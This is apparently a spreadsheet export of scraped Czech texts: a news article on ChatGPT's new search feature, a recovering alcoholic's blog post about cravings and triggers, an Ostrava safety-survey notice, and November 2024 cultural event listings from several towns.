    <t>Má se Google začít bát? ChatGPT spouští vlastní vyhledávač a má ambice ovládnout internet Všechny fotografie Na položené otázky ChatGPT odpoví stručně a v bočním panelu přehledně vypíše seznam zdrojů, ze kterých čerpal. Společnost uvažuje i o spojení vyhledávače s Advanced Voice Mode. O plánech OpenAI spustit vlastní internetový vyhledávač jsme informovali už dříve. Nyní po několikaměsíční odmlce se to skutečně děje. ChatGPT ve čtvrtečních hodinách obohatilo nové tlačítko signalizující přítomnost skutečného internetového vyhledávače. Služba ChatGPT Search je navržená a přímo integrovaná do chatbota a dokáže prohledávat web na základě vašich otázek, případně je možné vyhledávání manuálně vyvolat kliknutím na ikonu vyhledávání. Do budoucna chce jít společnost ještě dál a vyhledávání propojit se svým Advanced Voice Mode, což by uživatelům umožnilo plynule vyhledávat na internetu hlasovou komunikací s chatbotem. S ChatGPT si už popovídáte jako s kamarádem u piva . Advanced Voice Mode je nově dostupný u nás a rozumí česky Zatím pouze pro předplatitele, později zdarma všem Nová funkce vyhledávání je aktuálně dostupná pouze uživatelům s aktivním předplatným Plus a Team na počítačích a mobilních aplikacích. V horizontu několika následujících týdnů se chytrý vyhledávač rozšíří i na uživatele Enterprise a Education, pro „neplatiče“ bude vyhledávání dostupné v rámci následujících měsíců. Jak to celé funguje? Jednoduše a přímo z adresního řádku Jak bylo řečeno výše, vyhledávání můžete zapnout buď manuálně, nebo nechat ChatGPT automaticky vyhodnotit váš dotaz a vyhledat na internetu. A zeptat se jej můžete opravdu na cokoliv, od aktuálního počasí, stav akcií, koncerty ve vašem okolí až po aktuální zprávy nebo zajímavé události. Vyhledávač vám poté vždy odpověď sesumíruje ve stručné a zároveň dostatečně pochopitelné formě a v postranním panelu zobrazí všechny zdroje, ze kterých čerpal. To proto, aby v případě jakýchkoliv nejasností nebo podezření na blouznění umělé inteligence bylo rychle možné dostat se přímo ke zdroji a ověřit si faktičnost. Příklad vyhledávání v ChatGPT Search Autor: Cnews O tom, že to OpenAI s chytrým vyhledávačem opravdu myslí vážně, hovoří i nově vydaný doplněk pro prohlížeč Chrome, který umožní vyhledávat přímo z adresního řádku. Tímto způsobem je možné plně nahradit klasický vyhledávač Google. Ten sice nabízí něco podobného se svým AI Overviews, jeho stálá absence na evropské půdě jen nahrává OpenAI do karet. Google rozšířil dostupnost AI souhrnů ve vyhledávání, v EU ale zatím fungovat nebudou Mají se žurnalisté začít bát? Vyhledávání pomocí umělé inteligence ostatně není žádnou novinkou. S podobným projektem už dříve přišla například Perplexity, jak se ale později ukázalo, vývojáři ignorovali předplatitelské modely webů, ze kterých de facto kradli informace a obírali je tak o potenciální příjmy a návštěvnost. Tomuto scénáři se chce OpenAI vyhnout a přiznává, že při vývoji spolupracovalo se známými zpravodajskými weby (Vox Media, Associated Press , Axel Springer , Reuters Time a další), pečlivě naslouchalo zpětné vazbě a svůj vyhledávač přizpůsobilo tak, aby uživatelům pomohl pracovat s informacemi novým způsobem a vlastníkům obsahu přinesl nový způsob, jak oslovit širší publikum. „Jak umělá inteligence přetváří mediální prostředí, partnerství Axel Springeru s OpenAI otevírá obrovské příležitosti pro inovativní pokroky. Společně vytváříme nové obchodní modely, které zajišťují, že žurnalistika zůstane důvěryhodná a zisková.“ řekla Mathias Sanchez, viceprezidentka pro globální strategii Axel Springer SE. Autor: Dominik Dobrozenský Autor Dominik Dobrozenský</t>
  </si>
  <si>
    <t>11450</t>
  </si>
  <si>
    <t>22970</t>
  </si>
  <si>
    <t>20241101_68_3264627880_8e21e45882557678f8a9.html</t>
  </si>
  <si>
    <t>8e21e45882557678f8a9</t>
  </si>
  <si>
    <t>Když přijde chuť na alkohol a jsem alkoholik. Co jsou „spouštěče“?</t>
  </si>
  <si>
    <t>Když přijde chuť na alkohol a jsem alkoholik. Co jsou „spouštěče“? Když přijde chuť na alkohol a nechci se napít. Jsem alkoholik abstinent. Je jedno, jestli je to týden, rok nebo tři roky, kdy abstinujete, tu chuť, to bažení musíte zpracovat. Co bylo spouštěčem? Cesta ze dna byla náročná. Občas přicházejí chutě a bažení a když si je uvědomím, jako třeba dnes, tak je musím zpracovat . Dnes už většinou vím, jak se u mě projevují, třeba mám chuť nakupovat, řekněme nepřiměřeně a zbytečně… v určitém okamžiku jsem se díky tomu dostala do dluhů… nechtěla jsem si to přiznat. Někdo začne více jíst sladké, či slané. Je to u každého jiné. Také se mi stalo, že jsem měla suché bažení a to ve snu. Nevěnovala jsem se chutím a bažení, které se při abstinenci mohou projevovat i jinak, ne tedy chutí přímo na alkohol , ale jinak…takovou pozornost , jak bych měla… je to jiné nutkání, vůbec vám to z počátku nepřijde, že je to možné, protože v hlavě už mám srovnáno, rozhodnuto, že alkohol nechci… A nikdo vám přesně neřekne, kdy ty chutě a to bažení přestane. Takže je důležité se sobě věnovat, poznávat sebe, jste jiní, nesrovnávat, neříkat si, že je na tom někdo lépe a jiný hůře. Jako není to dobré ani špatné, je to jiné. A takové jsou, jiné, životy nás všech. Ale démon má různé podoby a tak se musím nějak zaměstnat, no trochu maluji, hodně čtu, připojuji se na mítinky AA, uklízím šuplíky, zacvičím si, přehazuji oblečení v poličkách…pak nic nenajdu… a věnuji se sama sobě… a taky trochu píšu… třeba deník, nebo něco co mě zaujme z knih, filmů a někdy, když se podívám do sebe, tak si vzpomenu… a třeba něco napíšu… každý po svém…A vůbec nemusí být špatné si připomínat v čem se člověk ocitl, za sebe myslím, že ta připomínka mi ukazuje, právě to, že už nechci pít… Bažina A já se v ní topím Polykám hořkost svého života Přestávám mít sílu Začínám si uvědomovat, co všechno jsem způsobila sobě i ostatním Klesám níž Nechci pít, ale nemůžu si pomoci Tělo i mysl je už tak závislé, že bez toho nelze žít Zavřu oči Motá se mi hlava. Asi se z těch slov v mé hlavě zblázním. Volám o pomoc, ale nepřímo, a proto mě nikdo neslyší Proč se mi to děje, proč zrovna já, která tolik touží žít Která tolik touží vzlétnout Přijde ten čas Musím se dostat na břeh Přímo požádat o pomoc… Dlouho mi trvalo, než jsem o pomoc požádala. Zpočátku jsem jen váhavě přiznávala, polemizovala o tom, že bych mohla mít problém. Zkoušela jsem, že když jsem dostala chuť na alkohol , že se nenapiji, jestli to vydržím. Ale moc dlouho jsem to nevydržela… vždycky jsem si našla důvod se napít … a tak jsem to odkládala na později, nějak jsem si to zdůvodnila a napila se. No jaké důvody byly nejčastější? Co třeba… dnes byl v práci den blbec…kolegyně mě tak naštvala… nemluvím o tom, že každou chvíli měl někdo svátek nebo narozeniny, nebo byl přímo nějaký svátek, který se přece společensky musel oslavit…pak třeba zelený čtvrtek…nebo Vánoce? Jako dospělá, jsem vánoce bez alkoholu měla až v léčebně. Byly to super Vánoce. Takže proč vlastně pít, abych se bavila, a nebo zapíjela problémy a svou nespokojenost… ano nespokojenost s vlastním životem. Když se vrátím k tomu, když dnes dostanu chuť nebo přijde bažení, co s tím dělám? Mozek funguje tak, že má vše uložené, hrozně rád si hraje se vzpomínkami, domněnkami, fantazií a vytváří úžasné iluze a tomu všemu co k tomu cítíme, tomu věříme. To jsou také možné spouštěče k chutím a bažení po alkoholu . Ano „spouštěč“. Zajímavé slovo, že? To jsem opomněla zmínit. Pokud už žijete tak, že víte, že nechcete pít a berete to už jako přirozenou věc, tak když ta chuť přijde či přichází, tak tomu předchází něco co vás k tomu spustí, tedy „spouštěč“. Hodně jsme to v léčebně probírali. Často nám to v léčebně a i po léčebně, když jsem začala chodit na doléčování k adiktologovi, bylo zdůrazňováno a že se to nemá podceňovat, a to z důvodů, že u každého člověka můžou a jsou různé spouštěče … Při jaké činnosti jste pili či popíjeli. Vůně je velmi mocný spouštěč. Když si dávám capuccino a přinesou mi k tomu panáka vody, tak poprosím, aby sklenku vyměnili. Z počátku jsem neměla v oblibě ani pet láhve, dnes už mi nevadí. Kolikrát je to i jiný člověk, jeho chování ve mě vyvolá vzpomínku mého chování ať jsem byla střízlivá, či opilá. U toho střízlivého chování to jednou ve mě vyvolalo chuť a bylo to chování, kdy jsem se já tak kdysi chovala, třeba povýšeně, namyšleně, hystericky. V případě opilého chování asi nemusím nic dodávat, myslím že si to dokážete představit. Když jsem chodila na skupinu měli tam takové heslo… Když je ti ouvej, tak běž na skupinu, a když se cítíš hodně šťastně, tak tam utíkej. Takže pozor, paradoxně i štěstí může být silným spouštěčem. Člověk se cítí sebejistě, vše mu vychází a tak může přestat být opatrný, může si říci, jedna sklenka neublíží. Pozor. I mě to kolikrát napadlo, ale já se rozhodla, že hazardovat či zkoušet to nechci. Je to na nás samých, jak se budeme chovat, takže každý musí vypozorovat sám co ho spouští. Když jsem přišla z léčebny pokračovala jsem v psaní deníku, na začátku mi to dost pomáhalo, každý večer jsem si udělala denní inventuru. Ta spočívala si projít celý den, třeba i jen v bodech… kudy jsem šla, jak jsem se po celý den cítila, klid či stres, jak mi bylo v obchodě, jak jsem reagovala na lidi okolo sebe, to mi čistilo můj vnitřní stav a i lépe se mi usínalo. No, je toho hodně, co se týká života alkoholika a není to jen procházka růžovou zahradou, jak se říká. Měla jsem i dost krizových období, ale o těch zase jindy. Vím, že je mnoho lidí a příběhů s tímto problémem, ale pořád mi připadá, že se málo veřejně mluví o tom, že je to nemoc a že určitě tomu nepřispívá, že v televizi ve filmech a i v českých seriálech se řeší problémy v hospodě u piva , že v televizi běží reklamy na zábavu s alkoholem . Reklamy supermarketů na slevy na alkohol . Mrzí mě, že se tomu propůjčí i celebrity, kterých si moc vážím. Ano, také jsem se bavila a ani mi alkohol zprvu nechutnal, ale abych se společností držela krok a protože jsem se neuměla odvázat, tak jsem sáhla po alkoholu . Jenže každý z nás je jiná osobnost a někdo udrží tu hranici… ale opravdu víme, kdy jsme u té hranice? Jak moc často na alkohol myslíme… Zkuste si odpovědět. Jsme ještě schopni se sami zachránit? Sdílím, protože chci. Chci, aby se lidem dostalo do povědomí, a to se netýká jen těch, kteří pijí, ale i těch, kteří nepijí… mladí, rodiče i ti staří… je to démon, který už zničil hodně životů… Zase někdy příště …a… Přeji hezké dny a opatrujte se Mili</t>
  </si>
  <si>
    <t>20241101_680_3281329495_da38fd82c432834571dc.html</t>
  </si>
  <si>
    <t>da38fd82c432834571dc</t>
  </si>
  <si>
    <t>CÍTÍTE SE V OSTRAVĚ BEZPEČNĚ?</t>
  </si>
  <si>
    <t>CÍTÍTE SE V OSTRAVĚ BEZPEČNĚ? Rubrika: VEŘEJNÝ PROSTOR DEJTE MĚSTU VĚDĚT, CO ZLEPŠIT Město Ostrava v průběhu listopadu uskuteční online mapování pocitu bezpečí Ostravanů i lidí, kteří v Ostravě dlouhodobě pobývají, pracují nebo studují. Výsledky budou veřejné a město je využije při plánování opatření ke zvýšení bezpečnosti v Ostravě . Cílem výzkumu je zjistit, nakolik se lidé v Ostravě cítí bezpečně, které lokality se jeví jako problémové a porovnat tyto výsledky se záznamy policie (tzv. evidovanou kriminalitou). Anonymní dotazník může vyplnit každý, komu je 15 a více let, žije v Ostravě nebo do města dojíždí za prací či studiem. VEŘEJNÝ POŘÁDEK V MOAP Bezpečnost je časté téma na setkáních vedení MOaP s občany, z nichž vyplynou podněty například na hlučné chování sousedů, nepořádek na veřejných místech, popíjení alkoholu na lavičkách před domy. Dokonce i v nově zrekonstruované Minikrajině Fifejdy musejí Technické služby MOaP několikrát týdně uklízet nepořádek po popíjení neukázněných osob. Na radnici se proto koná každý měsíc schůzka emergenčních složek za účasti vedení obvodu, zástupců Městské policie Ostrava, policie ČR a dalších bezpečnostních složek, kde se řeší také tyto podněty na porušování veřejného pořádku. Technické služby jsou speciálně proškolené co dělat s volně pohozenými injekčními jehlami a stříkačkami – pokud na ně narazí, vloží je do plastového obalu a odnesou do areálu Technických služeb, kde se vloží do speciálního boxu, který se následně předá společnosti Renarkon , jež se v Ostravě zabývá prevencí a léčbou závislostí. Petr Kuś: Místostarosta MOaP „Pokud naleznete pohozenou injekční stříkačku, nesnažte se ji sami zlikvidovat. Může to být nebezpečné. Zavolejte městskou policii, která si s nálezem obratem poradí. Není to vhodné hlásit prostřednictvím aplikace čistáOVA, protože tak dojde k nápravě až během 2-3 dnů. Opravdu nejlépe je zavolat na linku 156.“ Cítíte se v Ostravě bezpečně? Je vám 15+ let, žijete v Ostravě nebo sem dojíždíte za prací (studiem)? Co má město udělat, abyste se cítili bezpečněji? Vyplňte jednoduchý online dotazník. www.pocitovemapy.cz/ bezpecnost-ostrava-2024/ Rubrika transition_slide VEŘEJNÝ PROSTOR</t>
  </si>
  <si>
    <t>20241101_681_3281240306_9965c2a25b13207d941e.html</t>
  </si>
  <si>
    <t>9965c2a25b13207d941e</t>
  </si>
  <si>
    <t>KAM V TIŠNOVĚ</t>
  </si>
  <si>
    <t>KAM V TIŠNOVĚ listopad 2024 VÝSTAVA OBRAZŮ KAM Klubu amatérských malířů Tišnov 1. 11. – 31. 12. 2024 po, st a pá 8.00–18.00 hod. Městská knihovna Tišnov odd. pro dospělé Prodejní výstava obrazů malovaných převážně akvarelovou technikou na volné téma. Vystavují: Alena Jankovská – Tišnov , Jaromír Tauš – Tišnov , Jitka Klusková – Tišnov , Miroslava Vlčková – Tišnov , Markéta Leiferová – Lomnička , Dana Navrátilová – Jamné a Jana Ševčíková – Veverská Bítýška . PŘÍPRAVKA NA UMĚLECKÉ ŠKOLY Středy 6., 13., 20., 27. 11. 2024 15.00–16.30 hod. GJJ, Brněnská 475, Tišnov I v tomto školním roce jsme pro děti, které se budou hlásit na umělecké školy, připravili kurz Přípravka na umělecké školy. Na začátku školního roku se děti seznámí s nabídkou jednotlivých oborů, ukážeme si, jak by mělo vypadat portfolio ke zkouškám. V kurzu se účastníci naučí základy kresby – práci s tužkou, úhlem, popřípadě rudkou, i malby – akvarel, pastel, tempera. Trénujeme zde klasická zátiší, ale neopomíjíme ani volnou tvorbu. Děti si vyzkouší i výtvarné úkoly, které byly nebo jsou součástí zkoušek na střední umělecké školy. Kurz probíhá přímo v prostorách galerie mezi uměleckými artefakty. Kurz je vhodný i pro děti, které se chtějí rozvíjet v klasické kresbě a malbě. Kurz probíhá až do 11. 12. 2024. Cena za lekci je 250 Kč. Na kurz se lze připojit i v jeho průběhu. Přihlášení na mail lucie.zikanova@kulturatisnov.cz. VOŇAVÝ VEČER S AROMATERAPIÍ OD SRDCE 6. 11. 2024, 18.00–20.00 hod. GJJ, Brněnská 475, Tišnov Pro každého milovníka vůní a pro ty, kdo rádi citlivě využívají darů přírody. Za pomoci smyslu čichu nahlédneme do tajů aromaterapie, která sahá svým vznikem do doby několika tisíců let před Kristem. Společně se naladíme meditací vůní a dozvíte se o původu, kvalitě a výrobě esenciálních a nosných olejů, které si osaháme a očicháme. Odnesete si informace o bezpečném užívání aromaterapie v domácím prostředí a o vhodných kombinacích a na závěr si vyrobíte vlastní terapeutickou směs do roll-onku, kterou si odnesete domů. Cena: 390 Kč. Registrace nutná na galerie@kulturatisnov.cz, počet účastníků je omezen. ZÁKLADY KRESBY A MALBY čtvrtky 7., 14., 21., 28. 11. 2024 17.00–19.00 hod. GJJ, Brněnská 475, Tišnov Každý čtvrtek bude v galerii probíhat kurz Základy kresby a malby, kde si účastníci vyzkouší práci s tužkou, úhlem, rudkou, pastelem, tuší a akvarelem. Naučíme se základním kresebným a malířským postupům, jako jsou práce s linkou, stínování, lavírování tuší, postupům akvarelové techniky a budeme kombinovat jednotlivé výtvarné přístupy navzájem. Vyzkoušíte si kreslit/ malovat podle fotografií, ale důraz bude kladen především na kresbu/malbu podle reality a orientace v prostoru. Kurz je vždy přizpůsoben potřebám dané skupiny. Kurz je určen pro dospívající a dospělé. Probíhá až do 12. 12. 2024. Cena jedné lekce je 400 Kč. Výtvarný materiál v ceně. Na kurz se lze připojit i v jeho průběhu. Přihlášení na e-mail lucie.zikanova@kulturatisnov.cz. SOBOTNÍ VÝTVARNÁ DÍLNA PRO DĚTI I DOSPĚLÉ 9. 11. 2024, 9.00–11.00 hod. GJJ, Brněnská 475, Tišnov Grafická díla – suchá jehla – Listopadová dílna bude zaměřená na grafickou techniku suché jehly, kterou si vyzkoušíme na plechové destičky. Pro děti budou připraveny plastové destičky, které nejsou tolik náročné na zpracování. Téma výtvarné dílny budou přírodniny, jako jsou sušené květiny, listy, šišky apod., které jsou jednoduché a zároveň velmi efektní pro tuto techniku. Pokud budete chtít, můžete si přinést na zpracování své vlastní téma. Vaše vlastní invence budou jen vítané. Dílna je určena pro děti od 7 let, dospívající a dospělé. Rezervace nutná na lucie.zikanova@kulturatisnov.cz. Doporučené vstupné je 100 Kč. MARTINSKÝ SVĚTÝLKOVÝ PRŮVOD 11. 11. 2024, od 16.30 hod. sraz v parku u kostela Přijďte s dětmi na tradiční světýlkový průvod, který vede od kostela sv. Václava , Parkem pod kostelem, ulicí Brněnskou na náměstí Míru, kde si připomeneme legendu o sv. Martinovi a zazpíváme si. Vezměte si s sebou lampióny, nejlépe vlastní výroby. Pro zahřátí bude připraveno svařené víno a pro děti teplý mošt. Přijede i svatý Martin na bílém koni a rozdělí se s námi o sladké rohlíčky. Více na www.studanka-tisnov.cz. ADVENTNÍ SBÍRKA PRO POTŘEBNÉ 12.–24. 11. 2024 RC Studánka, Tišnov RC Studánka ve spolupráci s odborem sociálních věcí města Tišnova pořádá Adventní sbírku pro potřebné lidi z Tišnovska . Nosit můžete následující věci: z čisticích prostředků a hygienických potřeb savo, čisticí prostředky na povrchy koupelny a kuchyně, prací prášek, houbičky na nádobí, houbové utěrky, dětské pleny všech velikostí, pastu na zuby, z trvanlivých potravin těstoviny, luštěniny, konzervy masové, rybí a zeleninové, olej, piškoty, dětské výživy a instantní polévky. Tyto věci, prosím, noste do kanceláře RC Studánka, Riegrova 318, Tišnov . Nebo můžete pomoct „zakoupením“ balíčku přes studánkový rezervační systém. Děkujeme všem dárcům za jejich pomoc. Více na www.studanka-tisnov.cz. DĚJINY KLÁŠTERA V DOUBRAVNÍKU 16. 11. 2024, od 16.30 hod. kostel Povýšení sv. Kříže, Doubravník Římskokatolická farnost Doubravník vás zve na přednášku PhDr. Heleny Sedláčkové a PhDr. Jiřího Doležela K poctě svatého Kříže – Dějiny kláštera v Doubravníku v rámci cyklu Pernštejnové s námi. Přednáška je finančně podpořena Jihomoravským krajem a městysem Doubravník. JAK SI UŽÍT BÝT MÁMOU 22. a 29. 11. 2024 17.00–19.00 hod. RC Studánka, Tišnov Zveme ženy na cyklus dvou setkání, kde se budeme ladit na naši mateřskou roli a hledat cesty, jak si toto životní období co nejvíce užít a zjednodušit. Podíváme se na nejčastější důvody mateřského vyhoření a způsoby, jak mu předcházet. Budeme se také učit společně více zpomalit, zastavit se a být s dítětem tady a teď bez velkého spěchu a stresu. Podíváme se také na ženskou cykličnost a její využití v mateřství. Více na www.studanka-tisnov.cz. VERNISÁŽ VÝSTAVY TAJEMSTVÍ ŠTĚDROVEČERNÍHO STOLU 24. 11. 2024, 15.00 hod. Podhorácké muzeum Předklášteří Tématem výstavy jsou pokrmy štědrovečerního stolu, jejich symbolika, tradiční podoba i současné proměny. Součástí vernisáže bude komentovaná prohlídka výstavy a zpěv tradičních vánočních písní z Tišnovska . KOMENTOVANÁ PROHLÍDKA VÝSTAVY DELICACY OF FORM S AUTORKAMI 24. 11. 2024, 16.00–17.00 hod. GaJJ, Brněnská 475, Tišnov Seznamte se s autorkami výstavy – Pavlínou Kvitou, Boženou a Karolínou Rossí osobně. Pojítkem jejich rozdílných přístupů k tvorbě je téma mateřství a harmonie barev i tvarosloví. Svými díly vyjadřují hlubokou poctu tvořivé životní síle a sdílí cestu žití ve vděčnosti. Každá z nich navazuje na odlišnou mytologii – pro sochařku Pavlínu Kvitu je zásadní vliv dávných slovanských a valašských legend, malířka Karolína Rossí čerpá z mystiky súfismu a Božena Rossí nachází inspiraci v symbolice a lyrismu květů a rostlin. RELAXACE A IMAGINACE 27. 11. 2024, 18.00–19.30 hod. RC Studánka, Tišnov Přijďte si odpočinout po náročném pracovním vytížení! Relaxační metody přinášejí pocity osvěžení, uklidnění a štěstí. Tyto pozitivní pocity neprožívá jenom mysl, ale celé tělo. Relaxace a imaginace probíhá v malém počtu účastníků pod vedením psycholožky Mgr. Hany Pelčákové Kubecové. Více na www.studanka-tisnov.cz.</t>
  </si>
  <si>
    <t>5000</t>
  </si>
  <si>
    <t>20241101_682_3281021863_279ab80480edad5a0c4b.html</t>
  </si>
  <si>
    <t>279ab80480edad5a0c4b</t>
  </si>
  <si>
    <t>KNIHOVNA – LISTOPAD</t>
  </si>
  <si>
    <t>KNIHOVNA – LISTOPAD Pravidelné akce Trénování paměti 6. + 13. + 20. + 27. listopad 9.00–10.00 + 10.00–11.00 Virtuální U3V 4. + 18. listopadu od 10.00 a od 11.00 Drátování 4. + 11. + 18. + 25. listopadu od 17.00 Paličkování 6. + 20. listopadu od 16.30 Jazyková kavárna pro cizince 4. + 18. listopadu od 16.30 do 17.30 Jak na tablet a chytrý telefon 19. listopadu od 9.00 do 12.00 Hudební toulky 20. listopadu od 16.00, pobočka LITOL Ženy u klubíčka od 17.00 (termíny akce jsou k dispozici v knihovně) Kulturní akce v listopadu 2. listopadu od 14.00 Kde byly hřbitovy, kostnice a zahrady ticha aneb Procházka dušičkovou městskou památkovou zónou Komentovaná prohlídka po místech spojených s pohřbíváním v našem městě. Průvodcem bude Mgr. Ing. Stanislav Svoboda, Ph.D. Sraz účastníků ve 14.00 hod. v Zámecké ulici u brány do zámku. Akce se koná za každého počasí. Poslali nás k vodě aneb Co také dělá Domácí hospic Nablízku 5. listopadu od 17.00 Jak probíhá domácí hospicová péče a k čemu jsou služby hospice dobré? Přednáška Mgr. Petry Marhounové a Lenky Pešoutové, DiS. Život s vášní, čokoládou a vínem 12. listopadu od 17.00 Přijďte si vychutnat dokonalou harmonii chutí, kde se jemné tóny vybraných vín snoubí s lahodnou čokoládou. Čeká vás ochutnávka nových chuťových kombinací, které potěší všechny smysly, která bude doprovázena odborným výkladem Marcely Krčálové, přibližujícím ideální párování těchto delikates. Rezervujte si místo a zažijte neopakovatelný gurmánský zážitek! Vstupné 100 Kč, rezervace míst v knihovně, počet míst omezen! Připravujeme na prosinec Vánoční koncert 26. 12. od 16.00 Tradiční benefiční vánoční koncert v kostele Narození sv. Jana Křtitele v Lysé nad Labem Turistické Informační centrum Přehled akcí v Lysé nad Labem a v jejím okolí najdete na sociálních sítích informačního centra: https://www.facebook.com/infocentrumlysa, https://www.instagram.com/ infocentrumlysa/</t>
  </si>
  <si>
    <t>4550</t>
  </si>
  <si>
    <t>20241101_683_3281359177_1c7aa10a0ab94632b307.html</t>
  </si>
  <si>
    <t>1c7aa10a0ab94632b307</t>
  </si>
  <si>
    <t>CKV U CÉKÓVÉČKO PROGRAM V LISTOPADU 2024 N</t>
  </si>
  <si>
    <t>CKV U CÉKÓVÉČKO PROGRAM V LISTOPADU 2024 N 14:00 Beskydský slavík: Casting Casting pěvecké soutěže, která už změnila život mnoha lidem! Neváhej a přihlas se! Více na www.beskydskyslavik.cz. 19:00 Saša Ni klíč ková &amp;amp; Forfolk Koncert mladoboleslavské písničkářky Saši Niklíčkové a ostravské folkové kapely Forfolk. 19:00 Jiří Pavlica &amp;amp; Hradišťan Koncert v rámci slavností svátku svátého Martina. Součástí vstupenky je sklenice mladého vína . 19:00 5P Luboše Pospíšila Matador české hudební scény prožívá jedro z nejštast nějších období své více než padesátileté kariéry. 19:00 OZVĚNY: Gorolský večer Večer věnovaný hudbě a přírodě Beskyd . Vystoupí: Blaf, Odnikud nikam a Monika&amp;amp;Karol. 19:00 OZVĚNY: Marien Koncert hudební skupiny Marien z Pardubic , která se věnuje akustické kytarové muzice a vícehlasému zpěvu. Hraje melodické písně převážně z dílny Víti TroníČka. 17:00 Witchmodels - 5let spolu Už pátým rokem tým jedenácti obyčejné neobyčejných žen pořádá módní přehlídky vždy s charitativním účelem. Předvádějí módu pro dámy všech věkových skupin a různých konfekčních velikostí. 19:00 OZVĚNY: Štěpán Rak a Sluníčko Světový kytarový virtuos a skladatel Štěpán Rak spolu s bohuminským vokálním sdružením Sluníčko. 19:00 Mikę Ross Band (UK/CZ) Britský bluesový, rockový &amp;amp; „americana“ kytarista, skladatel a zpěvák Mikę Ross a tvrdé blues s kapkou psychedelie. 19:00 Hudební událost Muzikantské uskupení kolem frontmana Ivana Oskara Krainy. Hudební událost opět po roce v Parníku! Blues, alternativní rock a drsně poetický bigbeat. 19:00 Tros Jujos &amp;amp;. Peachman Repertoár kapely staví na známých bluesových standardech, amerických a anglidcých, pokud možno s vlastními texty. 19:00 OZVĚNY: Devítka a Za koncem Folková hudební skupina Devítka se zpěvákem a skladatelem Honzou Brožem s folkovou formací Za koncem z podhůří Beskyd . 19:00 jan Hrubý a přátelé Koncert plný překvapení, improvizace a nestárnoucích písní, například Večernice, Špejchar, Funebráci nebo Scarborough. Sestava: Jan Hrubý , Ondřej Fencl . Sean Barry a Michal Hnátek. 19:00 jet Set Big Band Swingový večer se slavnými melodiemi z repertoárů orchestru G. Millera, F. Sinatry, L. Armstronga a dalších. Kapelník: Vladimír Ševčík, zpěv: Daniela Kupčíkova, Zbyněk Temer. Martin Frynta a Míša Michna. 19:00 Pakostra Koncert ostravské bluesové formace Pakostra ve složení: Jiří „Kosta" Kostadinov, perkusista Jiří Šimánek , Oskar Krajina na foukačky, baskytarista I Lukáš Mužík a Tomáš Lasota na sólovou kytaru. 19:00 Mario Šeparovič &amp;amp; Vojta Šňupárek Zpěvák a kytarista srbochorvatského původu Mario Šeparovič hraje muziku s energickým nábojem na pomezí blues, soulu a funku za doprovodu ostravského kytaristy Vojty šňupárka. 19:00 Boris band Combination a host 1 Koncert ostravské jazz-bluesové kapely s hostem. 19:00 The Sound Pack ( Polsko ) jazzové vokální kvarteto tvoří Joanna Świniarska, Katarzyna Mirowska, Małgorzata Biniek a Maran Wawrzynowicz. V Klubu Parník vystoupí s klávesistou Bogusławem Kaczmarem. KLUB ATLANTIK www.klubatbntik.cz | *420 596138 821 ,e9if3058/7, 702 00 Ostrava - Moravská Ostrava po 4.11. 17:00 Workshop origami 8.11. 8:30 Workshop Janáčkovy filharmonie Ostrava pro pedagogy 6., 13., 20., 27.11. 16:00 Kurzy japonštiny Út12.11. 13:30 a 14:30 JFO Filharmonie Plus Hudební setkání seniorů. Út19.11. 17:00 Poetické vlny Atlantiku Jaroslav Seifert - básník nesoucí růže a říkající „a přece“ Přednáška lana Krášleného o díle Jaroslava Seiferta s obrazovou prezentací. Ukázky ze spisovatelovy tvorby v podání herce Jana Fišara a Markéty Pa lowské doprovodí na klavír Markéta Kotulánová. út26.11. 18:00 OZVĚNY: Jan Orlík - Kyrgyzstán , Uzbekistán a Tádžikistán Přednáška o třítýdenním putování po exotických Stanech. MINIKINO KAVÁRNA www.minikino.cz | *420 599 527 851 Kostelní 2572/3 rXWaMSIIII 702 00 Ostrava - Moravská Ostrava Z nabídky Minikina jsme pro Vás vybrali: KINO SENIOR st 20.11. 15:00 Konec světa CZ, 2024,134 minut st 27.11. 15:00 Janžurka CZ/SK. 2024.110 minut MINIKINO DĚTEM ne 17.11. 15:00 Kamarádi z Papuchalkovy skály GB/IR, 2023,80 minut ne 24.11. 15:00 Sobík Niko za polární září DK, 2024.85 minut NOVINKY A PREMIÉRY út 19.11. 17:00 je to ve hvězdách IT/SK/CZ/AUS/HR, 2024,99 minut, NOVINKA po 25.11. 19:30 Žena z... PL/SWE, 2023,132 minut, NOVINKA DALŠÍ AKCE 21.-24.11. 27. Festival francouzského filmu FILMOVÝ KLUB Út19.11. 19:30 107 matek SK/CZ . 2021.93 minut VILA HANSE ULRICHA www.sokolska26.ai | *420 596138 937 Sokolská třída 26/175, 702 00 Ostrava - Moravská Ostrava 6. 9.- 8.11. Jan Heres: výstava Peklo Malíř Jan Heres patří mezi výrazné talenty na tuzemské výtvarné umělecké scéně. Výstava děl s názvem Peklo představuje výběr z nejnovější série, kte'á vznikla po umělcově stáži na Tchaj-wanu Kurátorem výstavy je Michal Stolárik. so 9.11. 11:00 Slavnost svátého Martina: Degustace mladých vín a Svatomartinské menu Husí menu a vína moravských vinařů s hudebním doprovodem Cimbálové muziky Radegast a dobovým jarmarkem v okolí vily Vrcholem slavnosti bude od 19:00 hodin koncert Jiřího Pavlíci &amp;amp; Hradišťanu. Vstupné na koncert zakoupíte na: www.ckv.cz, pečenou husu, vývar a dezert si můžete objednat na: klubparnik.bar@gmail.com. 22.11. - 31.3.2025 Pohádky v umění: Hvězdy polské ilustrace pro děti WILKOŃ ISTASYSI LENICA | SIEMASZKO Interaktivní výstava 150 originálů z fondu Paláce lustrace. Snové prostředí plné umění, fantazie a tvořivosti doplňuje kreativní Hra fantazie a výtvarný ateliér pro děti. Kurátorem výstavy je Ivo Janoušek . Vernisáž se bude konat 21.11. v 17:00 hodin. 29.11.- 1.1.2025 Vánoční pohádková vila Interaktivní expozice s foukanými perličkovými ozdobami firmy Rautis ze seznamu UNESCO . Perlařská dílna, prodejní výstava, kreativní sady a períařský workshop. Dílny o víkendech: adventní věnce, drátová keramika, slaměné ozdoby a dlabané dřevo. OPEN AIR www.ckv-ostrava.cz | *420 596138 821 Sokolská třída 26/175, 702 00 Ostrava - Moravská Ostrava 7.6.- 31. 5.2025 Sochy!!! vol. 3... generace XY Tretí ročník exteriérové instalace soch současných špičkových umělců v Komenského sadech. Autoři: Ondřej Svoboda, Jan Dostál, Jaroslav Rona, Vojtěch Trocha. Jakub Flejšar . so 9.11. Slavnost svátého Martina: Průvod s lampiony Přijďte v 17:00 hodin s lampiony a lucernami na Masarykovo náměstí. Průvod Martina na bílém koni s družinou se odtud vydá к Vile Hanse Ulricha , kde se koná jarmark s doprovodným programem (11:00-19:00 hod.). Defilé vyvrcholí šermířským soubojem. Mladému vínu požehná evangelická farářka Ewa Jelínek . 